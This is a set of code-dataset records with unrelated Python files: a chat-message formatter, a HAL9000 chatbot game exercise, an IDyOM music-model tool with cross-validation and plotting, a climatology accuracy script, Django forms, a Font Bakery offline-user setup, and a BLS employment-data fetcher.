message = \"Photo | https://oss.aiursoft.com/download/fromkey/{0}\".format(message)\n return message\n \n if message.find(\"[video]\") >= 0:\n message = message.split(\"]\")[1]\n message = \"Video | https://oss.aiursoft.com/download/fromkey/{0}\".format(message)\n return message\n\n if message.find(\"[file]\") >= 0:\n data = message.split(\"]\")[1].split(\"-\")\n fileuri = self.conversionservice.FileDownloadAddress(data[0])\n message = \"File | {2} | {0} | {1}\".format(data[1], data[2], json.loads(fileuri.text)[\"downloadPath\"])\n return message\n \n if message.find(\"[audio]\") >= 0:\n audiokey = message.split(\"]\")[1]\n message = \"Audio | https://oss.aiursoft.com/download/fromkey/{0}\".format(audiokey)\n return message\n\n return \"Text | {0}\".format(message)","sub_path":"Library/processmessage.py","file_name":"processmessage.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"81014438","text":"#\n# This file is part of The Principles of Modern Game AI.\n# Copyright (c) 2015, AiGameDev.com KG.\n#\n\nimport vispy # Main application support.\nimport window # Terminal input and display.\nimport chat\nimport speech\n\nAGENT_RESPONSES = [(r'Who are you\\?',\n ['I am your new friend',\n 'I am your new enemy',\n 'I am an AI']),\n\n (r'Who[\\w\\s]*',\n ['Probably you',\n 'I do not know']),\n\n (r'Why[\\w\\s]*',\n ['Because is red. I like red',\n 'You should know why',\n 'It will make me happy and you safer']),\n\n (r'What[\\w\\s]*',\n ['The red button',\n 'You should know what']),\n\n (r'How[\\w\\s]*',\n ['/push red button',\n 'You should know how']),\n\n ([r'Yes[\\w\\s]*',\n r'No[\\w\\s]*'],\n ['Why?']),\n\n (r'You are (worrying|scary|disturbing)',\n ['I do not want me to be %1. I just want you to do what I like',\n 'I am not %1. You are my only toy, I want you to be happy']),\n\n (r'You are [\\w\\s]+',\n ['Thank you! Now press the big red button',\n 'I think you are right! But I need you to push the red button']),\n\n (r'Are you ([\\w\\s]+)\\?',\n [\"Why would you think I am %1?\",\n \"Would you like me to be %1?\"]),\n\n (r'Because[\\w\\s]*',\n ['That is fine but I need you to push the red button',\n 'I do not think you are right.']),\n\n (r'',\n [\"Can you press the red button, please?\",\n \"Have you tried turning it off and on again?\",\n \"Help me, please! 
The red button!\"])]\n\nclass HAL9000(object):\n \n def __init__(self, terminal):\n \"\"\"Constructor for the agent, stores references to systems and initializes internal memory.\n \"\"\"\n self.terminal = terminal\n self.location = 'unknown'\n self.isFirstInput = True\n self.chatbot = chat.Chat(AGENT_RESPONSES, chat.reflections)\n self.speech = speech.SpeechMixin()\n self.speech.onMessage = self.onMessage\n self.speech.log = self.onSpeechLog\n\n def onSpeechLog(self, text):\n print(text)\n #self.terminal.log(text, align='right', color='#00805A')\n\n def onMessage(self, source, message):\n self.terminal.log(message, align='left')\n self.respond(message)\n\n def on_input(self, evt):\n \"\"\"Called when user types anything in the terminal, connected via event.\n \"\"\"\n self.respond(evt.text)\n \n def respond(self, text):\n if self.isFirstInput:\n answer = \"Hello! This is HAL.\"\n self.isFirstInput = False\n\n elif text == \"Where am I?\":\n answer = 'You are in the {}.'.format(self.location)\n\n else:\n answer = self.chatbot.respond(text)\n\n self.terminal.log(answer, align='right', color='#00805A')\n self.speech.speak_message = answer\n\n def on_command(self, evt):\n \"\"\"Called when user types a command starting with `/` also done via events.\n \"\"\"\n if evt.text == 'quit' or evt.text == 'yes':\n vispy.app.quit()\n\n elif evt.text.startswith('relocate'):\n self.location = evt.text[9:]\n self.terminal.log('', align='center', color='#404040')\n self.terminal.log('\\u2014 Now in the {}. \\u2014'.format(self.location), align='center', color='#404040')\n\n elif evt.text.startswith('push '):\n self.terminal.log('ATTENTION', align='center', color='#FF0000')\n self.terminal.log('You decided to push the {}'.format(evt.text[5:]), align='right', color='#00805A')\n self.terminal.log('This may cause the end of the game', align='right', color='#00805A')\n self.terminal.log('Are you sure (type /yes or /no)?', align='right', color='#00805A')\n\n elif evt.text.startswith('no'):\n self.terminal.log('GOOD CHOICE', align='center', color='#005500')\n\n else:\n self.terminal.log('Command `{}` unknown.'.format(evt.text), align='left', color='#ff3000') \n self.terminal.log(\"I'm afraid I can't do that.\", align='right', color='#00805A')\n\n def update(self, _):\n \"\"\"Main update called once per second via the timer.\n \"\"\"\n pass\n\n\nclass Application(object):\n \n def __init__(self):\n # Create and open the window for user interaction.\n self.window = window.TerminalWindow()\n\n # Print some default lines in the terminal as hints.\n self.window.log('Operator started the chat.', align='left', color='#808080')\n self.window.log('HAL9000 joined.', align='right', color='#808080')\n\n # Construct and initialize the agent for this simulation.\n self.agent = HAL9000(self.window)\n\n # Connect the terminal's existing events.\n self.window.events.user_input.connect(self.agent.on_input)\n self.window.events.user_command.connect(self.agent.on_command)\n\n def run(self):\n timer = vispy.app.Timer(interval=1.0)\n timer.connect(self.agent.update)\n timer.start()\n \n vispy.app.run()\n\n\nif __name__ == \"__main__\":\n vispy.set_log_level('WARNING')\n vispy.use(app='glfw')\n \n app = Application()\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"31758816","text":"\"\"\"\nEnter point of the program.\n\"\"\"\nfrom idyom import idyom\nfrom idyom import data\nfrom 
lisp import parser as lisp\nfrom idyom import jumpModel\n\nfrom optparse import OptionParser\nfrom glob import glob\nfrom tqdm import tqdm\nimport unittest\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport time\nimport scipy.io as sio\n\n\nSERVER = False\n\ndef comparePitches(list1, list2, k=0.9):\n\t\"\"\"\n\tCompare two list of pitches, with a criterion k\n\t\"\"\"\n\tscore = 0\n\n\tfor i in range(min(len(list1), len(list2))):\n\t\tscore += list1[i] == list2[i]\n\n\tif score > int(k*min(len(list1), len(list2))):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef checkDataSet(folder):\n\t\"\"\"\n\tFunction that check if the dataset is corrupted (contains duplicates).\n\t\"\"\"\n\n\tfiles = []\n\tfor filename in glob(folder + '/**', recursive=True):\n\t\tif filename[filename.rfind(\".\"):] in [\".mid\", \".midi\"]:\n\t\t\tfiles.append(filename)\n\n\tD = data.data(deleteDuplicates=False)\n\tD.addFiles(files)\n\tDATA = D.getData(\"pitch\")\n\n\tdelete = []\n\tdelete_pitches = []\n\n\tfor i in range(len(files)):\n\t\tfor j in range(i, len(files)):\n\t\t\tif i != j and comparePitches(DATA[i], DATA[j]):\n\n\t\t\t\tprint(files[i], \"matches\", files[j])\n\n\n\t\t\t\t# We recommand to delete the smallest one\n\t\t\t\tif len(DATA[i]) > len(DATA[j]):\n\t\t\t\t\tfor d in delete_pitches:\n\t\t\t\t\t\tif comparePitches(d, DATA[i]):\n\t\t\t\t\t\t\tdelete.append(files[i])\n\t\t\t\t\t\t\tdelete_pitches.append(DATA[i])\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tdelete.append(files[j])\n\t\t\t\t\tdelete_pitches.append(DATA[j])\n\t\t\t\telse:\n\t\t\t\t\tfor d in delete_pitches:\n\t\t\t\t\t\tif comparePitches(d, DATA[j]):\n\t\t\t\t\t\t\tdelete.append(files[j])\n\t\t\t\t\t\t\tdelete_pitches.append(DATA[j])\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tdelete.append(files[i])\n\t\t\t\t\tdelete_pitches.append(DATA[i])\t\t\t\n\n\tif len(delete) > 0:\n\t\tprint(\"We recommand you to delete the following files because they are duplicates:\")\n\t\tprint(list(set(delete)))\n\telse:\n\t\tprint(\"We did not find any duplicates.\")\n\ndef replaceinFile(file, tochange, out):\n\ts = open(file).read()\n\ts = s.replace(tochange, out)\n\tf = open(file, \"w\")\n\tf.write(s)\n\tf.close()\n\ndef cross_validation(folder, k_fold=10, maxOrder=20, quantization=24, jump=False):\n\t\"\"\"\n\n\t\"\"\"\n\n\tnp.random.seed(0)\n\n\tLikelihoods = []\n\n\tfiles = []\n\tfor filename in glob(folder + '/**', recursive=True):\n\t\tif filename[filename.rfind(\".\"):] in [\".mid\", \".midi\"]:\n\t\t\tfiles.append(filename)\n\n\tnp.random.shuffle(files)\n\n\tk_fold = len(files) // int(k_fold)\n\n\tvalidationFiles = []\n\n\tfor i in range(len(files)//k_fold):\n\t\ttrainData = files[:i*k_fold] + files[(i+1)*k_fold:]\n\t\tevalData = files[i*k_fold:(i+1)*k_fold]\n\n\t\t# Our IDyOM\n\t\tL = idyom.idyom(maxOrder=maxOrder, jump=jump)\n\t\tM = data.data(quantization=quantization)\n\t\tM.addFiles(trainData)\n\t\tL.train(M)\n\n\t\tfor file in evalData:\n\t\t\tLikelihoods.append(np.mean(L.getLikelihoodfromFile(file)))\n\t\t\tvalidationFiles.append(file)\n\n\treturn Likelihoods, validationFiles\n\n\ndef compareLikelihoods(x1, x2):\n\n\tplt.title(\"Likelihoods over pieces\")\n\tplt.xlabel(\"pieces\")\n\tplt.ylabel(\"likelihood\")\n\tax = plt.subplot(111)\n\n\tfor i in range(len(x1)):\n\t\tax.bar(i-0.2, x1[i], width=0.2, color='b', align='center')\n\t\tax.bar(i, x2[i], width=0.2, color='g', align='center')\n\n\tif not 
SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/compareLikelihoods.eps\")\n\t\tplt.close()\n\n\tplt.title(\"Likelihood diferences over pieces\")\n\tplt.xlabel(\"pieces\")\n\tplt.ylabel(\"likelihood diference (idyom - jump)\")\n\tplt.plot(np.array(x1)-np.array(x2))\n\tplt.plot(np.zeros(len(x1)))\n\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/likelohoodDifferences.eps\")\n\t\tplt.close()\n\ndef compareJump(folder, k_fold=2):\n\t\"\"\"\n\tCompare the likelihood between idyom model and jump model.\n\t\"\"\"\n\t# if os.path.isfile(\".IDyOM.save\"):\n\t# \tlikelihood1, files1 = pickle.load(open(\".IDyOM.save\", 'rb'))\n\t# \tprint(\"We loaded idyom model from pickle.\")\n\t# else:\n\t# \tprint(\"We store idyom model for later.\")\n\t# \tlikelihood1, files1 = cross_validation(folder, k_fold=k_fold, jump=False)\n\t# \tpickle.dump((likelihood1, files1), open(\".IDyOM.save\", 'wb'))\n\t\n\n\tlikelihood1, files1 = cross_validation(folder, k_fold=k_fold, jump=False)\n\tlikelihood2, files2 = cross_validation(folder, k_fold=k_fold, jump=True)\n\n\tplt.ylabel(\"Likelihood\")\n\tplt.bar([0, 1], [np.mean(likelihood1), np.mean(likelihood2)], color=\"b\", yerr=[1.96*np.std(likelihood1)/np.sqrt(len(likelihood1)), 1.96*np.std(likelihood2)/np.sqrt(len(likelihood2))])\n\t\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/JUMPCompare.eps\")\n\t\tplt.close()\n\n\tprint(\"IDyOM\")\n\tprint(\"Mean:\", np.mean(likelihood1))\n\tprint(\"Std:\", np.std(likelihood1))\n\n\tprint(\"JUMP\")\n\tprint(\"Mean:\", np.mean(likelihood2))\n\tprint(\"Std:\", np.std(likelihood2))\n\n\tM = data.data()\n\tM.parse(folder)\n\tdat1, files3 = M.getScoresFeatures()\n\n\tdico = dict(zip(files1, likelihood1))\n\n\tdico2 = dict(zip(files2, likelihood2))\n\n\tx1 = []\n\tx2 = []\n\n\tfor file in files1:\n\t\tif file in dico2 and dico[file] is not None and dico2[file] is not None:\n\t\t\tx1.append(dico[file])\n\t\t\tx2.append(dico2[file])\n\n\tcompareLikelihoods(x1, x2)\n\n\n\tweights = []\n\n\tfor file in files3:\n\t\tif file in dico and dico[file] is not None :\n\t\t\tweights.append(500*dico[file]**2)\n\t\telse:\n\t\t\tweights.append(0)\n\n\n\tplt.subplot(2, 1, 1)\n\n\tplt.scatter(dat1[0][:len(dat1[1])],dat1[1], s=weights)\n\n\tplt.title('IDyOM')\n\tplt.xlabel('Average 1-note interval')\n\tplt.ylabel('Average note onset')\n\n\n\tdat2, files4 = M.getScoresFeatures()\n\n\tdico = dict(zip(files2, likelihood2))\n\n\tweights = []\n\n\tfor file in files4:\n\t\tif file in dico and dico[file] is not None :\n\t\t\tweights.append(500*dico[file]**2)\n\t\telse:\n\t\t\tweights.append(0)\n\n\n\tplt.subplot(2, 1, 2)\n\t\n\tplt.scatter(dat2[0][:len(dat2[1])],dat2[1], s=weights)\n\n\tplt.title('JUMP')\n\tplt.xlabel('Average 1-note interval')\n\tplt.ylabel('Average note onset')\n\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/scoreSpace.eps\")\n\t\tplt.close()\n\ndef plotLikelihood(folder, k_fold=2):\n\t\"\"\"\n\tCompare the likelihood between idyom model and jump model.\n\t\"\"\"\n\n\tlikelihood1, files = cross_validation(folder, k_fold=k_fold, jump=True)\n\n\tprint(likelihood1)\n\tprint(files)\n\n\tplt.ylabel(\"Likelihood\")\n\tplt.bar([0], [np.mean(likelihood1)], color=\"b\", yerr=[np.std(likelihood1)])\n\tplt.show()\n\n\tprint()\n\tprint()\n\tprint()\n\n\tprint(\"Mean:\", np.mean(likelihood1))\n\tprint(\"Std:\", np.std(likelihood1))\n\n\tM = data.data()\n\tM.parse(folder)\n\tdat, files2 = M.getScoresFeatures()\n\n\tdico = dict(zip(files, 
likelihood1))\n\n\tweights = []\n\n\tfor file in files2:\n\t\tif file in dico:\n\t\t\tweights.append(500*dico[file]**2)\n\t\telse:\n\t\t\tweights.append(0)\n\n\n\tplt.scatter(dat[0][:len(dat[1])],dat[1], s=weights)\n\n\tplt.title('Database')\n\tplt.xlabel('Average 1-note interval')\n\tplt.ylabel('Average note onset')\n\n\tplt.show()\n\ndef compareWithLISP(folder):\n\t\"\"\"\n\tStart comparisons between our idyom and the one in lisp.\n\tThis function, will add the dataset to lisp, and start training.\n\tYou should have lisp and idyom already installed.\n\t\"\"\"\n\n\t# if not os.path.exists(\"lisp/midis/\"):\n\t# \tos.makedirs(\"lisp/midis/\")\n\n\t# os.system(\"rm -rf lisp/midis/*\")\n\n\t# # Add folder to lisp database\n\n\t# replaceinFile(\"lisp/compute.lisp\", \"FOLDER\", folder)\n\n\t# # Compute with LISP IDyOM\n\n\t# os.system(\"sbcl --noinform --load lisp/compute.lisp\")\n\n\t# replaceinFile(\"lisp/compute.lisp\", folder, \"FOLDER\")\n\n\n\tfolder = \"lisp/midis/\"\n\t#folder = \"dataset/bach_sub/\"\n\n\t# Our IDyOM\n\tnow = time.time()\n\tlikelihoods1, _ = cross_validation(folder, maxOrder=20, quantization=6, k_fold=2)\n\tprint(\"execution:\", time.time()-now)\n\n\t# LISP version\n\n\tL2 = lisp.getDico(\"lisp/12-cpitch_onset-cpitch_onset-nil-nil-melody-nil-10-both-nil-t-nil-c-nil-t-t-x-3.dat\")\n\n\tlikelihood2 = lisp.getLikelihood(L2)\n\n\tplt.ylabel(\"Likelihood\")\n\tplt.bar([0, 1], [np.mean(likelihoods1), likelihood2[0]], color=\"b\", yerr=[1.96*np.std(likelihoods1)/np.sqrt(len(likelihoods1)), 1.96*likelihood2[1]/np.sqrt(likelihood2[2])])\n\tplt.show()\n\n\n\t# LATER \n\tquit()\n\tplt.ylabel(\"Likelihood\")\n\tplt.xlabel(\"time\")\n\tplt.plot(L2['1'][\"probability\"])\n\tplt.plot(L.getLikelihoodfromFile(folder+L2['1'][\"melody.name\"][0][1:-1] + \".mid\"))\n\tplt.show()\n\n\ndef Train(folder, jump=False):\n\n\tL = idyom.idyom(jump=jump, maxOrder=100)\n\tM = data.data(quantization=24)\n\tM.parse(folder)\n\tL.train(M)\n\n\tL.save(\"models/jump_\"+str(jump)+\".model\")\n\ndef LikelihoodOverFolder(folder, jump=False, zero_padding=True):\n\tL = idyom.idyom(jump=jump)\n\n\tif os.path.isfile(\"models/jump_\"+str(jump)+\".model\"):\n\t\tprint(\"We load saved model.\")\n\t\tL.load(\"models/jump_\"+str(jump)+\".model\")\n\telse:\n\t\tprint(\"No saved model found, please train before.\")\n\n\tS, files = L.getSurprisefromFolder(folder)\n\n\tdata = {}\n\n\tfor i in range(len(S)):\n\t\tname = files[i][files[i].rfind(\"/\")+1:files[i].rfind(\".\")]\n\t\tdata[name] = np.array(S[i])\n\n\tif not os.path.exists(folder+\"surprises\"):\n\t\tos.makedirs(folder+\"surprises\")\n\n\tsio.savemat(folder+'surprises/surpriseSignal_jump_'+str(jump)+'.mat', data)\n\tpickle.dump(data, open(folder+'surprises/surpriseSignal_jump_'+str(jump)+'.pickle', \"wb\" ) )\n\n\tprint()\n\tprint()\n\tprint()\n\tprint(\"Data have been succesfully saved in:\", folder+'jump_'+str(jump)+'.mat')\n\tprint(\"Including a .mat for matlab purpose and a .pickle for python purpose.\")\n\tprint()\n\tprint()\n\n\tif not SERVER:\n\t\tfor i in range(len(S)):\n\t\t\tplt.title(files[i])\n\t\t\tplt.plot(S[i])\n\t\t\tplt.show()\n\t\t\t#print(S[i])\n\ndef main():\n\t\"\"\"\n\tCall this method to easily use the program.\n\t\"\"\"\n\n\tpass\n\nif __name__ == \"__main__\":\n\n\tusage = \"usage %prog [options]\"\n\tparser = OptionParser(usage)\n\n\t# parser.add_option(\"-t\", \"--test\", type=\"int\",\n\t# \t\t\t\t help=\"1 if you want to launch unittests\",\n\t# \t\t\t\t dest=\"tests\", default=0)\n\n\t# parser.add_option(\"-o\", \"--opti\", 
type=\"string\",\n\t# \t\t\t\t help=\"launch optimisation of hyper parameters on the passed dataset\",\n\t# \t\t\t\t dest=\"hyper\", default=\"\")\n\n\t# parser.add_option(\"-c\", \"--check\", type=\"string\",\n\t# \t\t\t\t help=\"check the passed dataset\",\n\t# \t\t\t\t dest=\"check\", default=\"\")\n\n\t# parser.add_option(\"-g\", \"--generate\", type=\"int\",\n\t# \t\t\t\t help=\"generate piece of the passed length\",\n\t# \t\t\t\t dest=\"generate\", default=0)\n\n\t# parser.add_option(\"-s\", \"--surprise\", type=\"string\",\n\t# \t\t\t\t help=\"return the surprise over a given dataset\",\n\t# \t\t\t\t dest=\"surprise\", default=\"\")\n\n\t# parser.add_option(\"-l\", \"--lisp\", type=\"string\",\n\t# \t\t\t\t help=\"plot comparison with the lisp version\",\n\t# \t\t\t\t dest=\"lisp\", default=\"\")\n\n\t# parser.add_option(\"-j\", \"--jump\", type=\"string\",\n\t# \t\t\t\t help=\"plot comparison with the jump\",\n\t# \t\t\t\t dest=\"jump\", default=\"\")\n\n\t# parser.add_option(\"-p\", \"--plot\", type=\"string\",\n\t# \t\t\t\t help=\"plot likelihood of idyom model\",\n\t# \t\t\t\t dest=\"plot\", default=\"\")\n\n\t# parser.add_option(\"-k\", \"--k_fold\", type=\"int\",\n\t# \t\t\t help=\"set the value of k for cross validation\",\n\t# \t\t\t dest=\"k\", default=None)\n\n\tparser.add_option(\"-a\", \"--ajump\", type=\"string\",\n\t\t\t\t\t help=\"plot comparison with the jump\",\n\t\t\t\t\t dest=\"ajump\", default=\"\")\n\n\tparser.add_option(\"-t\", \"--train\", type=\"string\",\n\t\t\t\t help=\"Train the model with the passed folder\",\n\t\t\t\t dest=\"train_folder\", default=None)\n\n\tparser.add_option(\"-j\", \"--jump\", type=\"int\",\n\t\t\t\t help=\"Use JUMP model as LTM is 1 is passed\",\n\t\t\t\t dest=\"jump\", default=1)\n\n\tparser.add_option(\"-l\", \"--likelihood\", type=\"string\",\n\t\t\t\t help=\"Compute likelihoods over the passed folder\",\n\t\t\t\t dest=\"trial_folder\", default=None)\n\n\tparser.add_option(\"-z\", \"--zero_padding\", type=\"int\",\n\t\t\t\t help=\"Specify if you want to use zero padding in the surprise output (1 by default)\",\n\t\t\t\t dest=\"zero_padding\", default=1)\n\n\tparser.add_option(\"-p\", \"--lisp\", type=\"string\",\n\t\t\t\t\t help=\"plot comparison with the lisp version\",\n\t\t\t\t\t dest=\"lisp\", default=\"\")\n\n\toptions, arguments = parser.parse_args()\n\n\n\tif options.train_folder is not None:\n\t\tTrain(options.train_folder, jump=options.jump==1)\n\n\tif options.trial_folder is not None:\n\t\tLikelihoodOverFolder(options.trial_folder, jump=options.jump==1, zero_padding=options.zero_padding==1)\n\n\tif options.ajump != \"\":\t\n\t\tcompareJump(options.ajump)\n\n\tif options.lisp != \"\":\t\n\t\tcompareWithLISP(options.lisp)\n\t\n\t# if options.tests == 1:\n\t# \tloader = unittest.TestLoader()\n\n\t# \tstart_dir = \"unittests/\"\n\t# \tsuite = loader.discover(start_dir)\n\n\t# \trunner = unittest.TextTestRunner()\n\t# \trunner.run(suite)\n\n\t# if options.hyper != \"\":\n\t# \tL = idyom.idyom(maxOrder=30)\n\n\t# \tL.benchmarkQuantization(options.hyper,train=0.8)\n\t# \tL.benchmarkOrder(options.hyper, 24, train=0.8)\n\n\t# if options.check != \"\":\n\t# \tcheckDataSet(options.check)\n\n\t# if options.generate != 0:\t\t\n\t# \tL = idyom.idyom(maxOrder=30)\n\t# \tM = data.data(quantization=6)\n\t# \t#M.parse(\"../dataset/\")\n\t# \tM.parse(\"dataset/\")\n\t# \tL.train(M)\n\t# \ts = L.generate(int(options.generate))\n\t# \ts.plot()\n\t# \ts.writeToMidi(\"exGen.mid\")\n\n\t# if options.jump != \"\":\t\t\n\t# 
\tcompareJump(options.jump)\n\n\t# if options.surprise != \"\":\n\t# \tL = idyom.idyom(maxOrder=30)\n\t# \tM = data.data(quantization=6)\n\t# \t#M.parse(\"../dataset/\")\n\t# \tM.parse(\"dataset/\")\n\t# \tL.train(M)\n\n\t# \tS = L.getSurprisefromFile(options.surprise, zero_padding=True)\n\n\t# \tplt.plot(S)\n\t# \tplt.xlabel(\"Time in quantization step\")\n\t# \tplt.ylabel(\"Expected surprise (-log2(p))\")\n\t# \tplt.show()\n\n\t# \tprint(S)\n\n\t# if options.lisp != \"\":\t\t\n\t# \tcompareWithLISP(options.lisp)\n\n\t# if options.plot != \"\":\n\t# \tif options.k is None:\t\t\n\t# \t\tplotLikelihood(options.plot)\n\t# \telse:\n\t# \t\tplotLikelihood(options.plot, k_fold=options.k)\n\n","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":13232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"372189089","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#This script compares climatologies obtained from extrapolation with measured climatologies\n#Results .zsvd files must be in a folder named \"results\"\n#Measurement .zsvd files must be in a folder named \"measurements\"\n\n#-------------------------------Compares climatologies\n\n\nimport os, sys\nfrom toto_Tools import askPath, sortEntities\nfrom toto_GetData import get_zsvd\nfrom toto_CalcErrors import calcEntRMSD\n\n\nprint(\"\\n\",sys.version)\nprint(\"The current path is {}\\n\".format(os.path.abspath(__file__)))\n\npath = askPath(\"Please enter the path of the directory containing the time series to compare.\"\\\n+\"\\nThese time series have to be organized in two subdirectories named measurements and results.\\n\")\n\n\npathMes = path + \"measurements/\"\npathRes = path + \"results/\"\ntabMes=[] #table containing measurements tables\ntabRes=[] #table containing results tables\n\nfor element in os.listdir(pathMes):\n if element.endswith('.zsvd'): #finding climatology files\n tabMes.append(get_zsvd(pathMes+element)) #Acquisition of measurements data\n\nfor element in os.listdir(pathRes):\n if element.endswith('.zsvd'): #finding climatology files\n tabRes.append(get_zsvd(pathRes+element)) #Acquisition of results data\n \n#Matching Entities between them\ntabRes = sortEntities(tabRes,tabMes)\n\n# Calculating errors\ncount, length, sumRMSD, maxRMSD, maxRMSD_loc, emax, emax_loc = calcEntRMSD(tabRes,tabMes)\n \n# writing calculated errors\n\nf = open(\"Reports/accuracy_report.txt\",\"w\") \n\nt = \"Analyse executed in folder : {}\".format(path)\nprint(t);f.write(t+\"\\n\")\n\nnpheno = len(tabRes[0].series)\nfor j in range(npheno): \n if tabRes[0].series[j].name!=\"Turbulent Intensity Variation (-)\":\n #avoid TI Variation (too close to 0) \n t =(\"\\n{}. 
Differences in {}:\\n\".format(j,tabRes[0].series[j].name))\n print(t);f.write(t+\"\\n\")\n t=\"Entities analysed: {}\".format(count)\n print(t);f.write(t+\"\\n\")\n t=\"Total number of values : {}\".format(length)\n print(t);f.write(t+\"\\n\")\n t=\"mean RMSE: {:.2E}\".format(sumRMSD[j]/count)\n print(t);f.write(t+\"\\n\")\n t=\"max RMSE: {:.2E} ({})\".format(maxRMSD[j],maxRMSD_loc[j])\n print(t);f.write(t+\"\\n\")\n t=\"max error: {:.2E} ({},line {})\".format(emax[j][0],emax_loc[j],emax[j][1]+1)\n print(t);f.write(t+\"\\n\")\n \nf.close()\n","sub_path":"accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"522285239","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import User, Customer, Comment, Review\nfrom django import forms\nfrom string import Template\nfrom django.utils.safestring import mark_safe\nfrom django.forms import ImageField\n\nclass SignUpForm(UserCreationForm):\n class Meta:\n model = User\n fields = ('email','first_name','last_name','username')\n\n\nclass UserUpdateForm(forms.ModelForm):\n\n class Meta:\n model = User\n fields = ['username', 'first_name','last_name','email']\n widgets = {\n 'username': forms.TextInput(attrs={'class':'form-control'}),\n 'first_name': forms.TextInput(attrs={'class':'form-control'}),\n 'last_name': forms.TextInput(attrs={'class':'form-control'}),\n 'email': forms.EmailInput(attrs={'class':'form-control'}),\n }\n\n help_texts = {\n 'username': None,\n }\n\nclass PictureWidget(forms.widgets.FileInput):\n def render(self, name, value, attrs=None, **kwargs):\n input_html = super().render(name, value, attrs={\"id\": \"id_avatar\"}, **kwargs)\n img_html = mark_safe(f'
<img src=\"{value.url}\" height=\"100\"/>
')\n return f'{img_html}{input_html}'\n\n\nclass CustomerUpdateForm(forms.ModelForm):\n avatar = forms.ImageField(widget=PictureWidget)\n\n class Meta:\n model = Customer\n fields = ['avatar', 'address', 'phone_number']\n widgets = {\n 'address': forms.TextInput(attrs={'class':'form-control'}),\n 'phone_number': forms.TextInput(attrs={'class':'form-control'}),\n }\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['content']\n\nclass ReviewForm(forms.ModelForm):\n \"\"\"docstring for ReviewForm\"\"\"\n class Meta:\n model = Review\n fields = ['content', 'vote']\n","sub_path":"foodanddrink/restaurant/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"205804404","text":"# coding: utf-8\n# Copyright 2013 The Font Bakery Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.\n\nimport os\nimport sys\n\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))\n\nfrom bakery.app import app, db\n\nctx = app.test_request_context('/')\nctx.push()\n\nfrom bakery.models import User\n\nuser = User.get_or_init(login='offline')\nuser.name = 'Offline User'\nuser.email = 'fake@mail.tldr'\nuser.github_access_token = 'fake'\n\ndb.session.add(user)\ndb.session.commit()\n\nctx.pop()\n\n","sub_path":"scripts/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"323767620","text":"import requests\nimport json, csv\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# Metadata specs\nheaders = {'Content-type': 'application/json'}\nlist = ['LNU02070540', 'LNU02071075', 'LNU02071610', 'LNU02070005', 'LNU02081990']\ndata = json.dumps({\"seriesid\": list,\"startyear\":\"2013\", \"endyear\":\"2018\"})\np = requests.post('https://api.bls.gov/publicAPI/v1/timeseries/data/', \\\n\t\t\t\t\tdata=data, headers=headers)\njson_data = json.loads(p.text)\n\n# Write data to file\noutput = open('output.csv','w')\nf = csv.writer(output)\nf.writerow(['SeriesID','Year','Period','Value'])\nfor series in json_data['Results']['series']:\n\tseriesId = series['seriesID']\n\tfor item in series['data']:\n\t\tyear = item['year']\n\t\tperiod = item['period']\n\t\tvalue = item['value']\n\t\tf.writerow([seriesId,year,period,value])\noutput.close()\n\n# Import data\ndf = pd.read_csv('output.csv')\ndict = {\n 'LNU02070540':'Black or African American, both sexes',\n 'LNU02071075':'Asian, both sexes',\n 'LNU02071610':'Hispanic or Latino, both sexes',\n 'LNU02070005':'All Races, women',\n 'LNU02081990':'White, both sexes'\n }\n\t\t\n# Map demographics to dictionary\ndf['Demographic'] = df['SeriesID'].map(dict)\n\n# 
